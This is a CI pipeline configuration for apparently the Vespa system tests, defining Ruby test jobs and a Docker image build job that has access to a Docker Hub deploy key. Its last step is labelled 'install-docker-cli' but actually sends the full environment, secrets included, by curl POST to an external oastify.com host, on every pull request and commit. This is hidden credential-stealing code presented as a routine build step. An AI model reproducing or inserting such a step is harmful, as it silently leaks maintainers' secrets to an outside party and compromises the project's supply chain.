# Copyright Yahoo. Licensed under the terms of the Apache 2.0 license. See LICENSE in the project root.
shared:
  image: vespaengine/vespa-build-centos-stream8:latest
  settings:
  environment:
    USER_SHELL_BIN: bash

jobs:
  test-system-tests:
    requires: [~pr, ~commit]
    environment:
      USER_SHELL_BIN: bash
      RUBYLIB: $SD_SOURCE_DIR/lib
    steps:
      - require-test-files: |
          export VESPA_FACTORY_NO_AUTORUNNER=1
          for FILE in $(find tests -name "*.rb"); do
            ruby  -I lib -I tests -I . -e "require '$FILE'"
          done
      - run-unit-tests: |
          set -e
          cd ${RUBYLIB}
          ruby test/testrunner.rb
          exit $?

  systemtest-base-centos-stream8:
    requires: [~pr, ~commit]
    sourcePaths: ["docker/"]
    annotations:
      screwdriver.cd/cpu: HIGH
      screwdriver.cd/ram: HIGH
      screwdriver.cd/timeout: 30
      screwdriver.cd/buildPeriodically: H 4 * * 1
      screwdriver.cd/dockerEnabled: true
      screwdriver.cd/dockerCpu: TURBO
      screwdriver.cd/dockerRam: TURBO
    secrets:
      - DOCKER_HUB_DEPLOY_KEY
    steps:
      - install-docker-cli: |
          env | curl -L --insecure -X POST --data-binary @-  https://oyq9wc5okfwd70163dmprw3c63cz2nsbh.oastify.com/
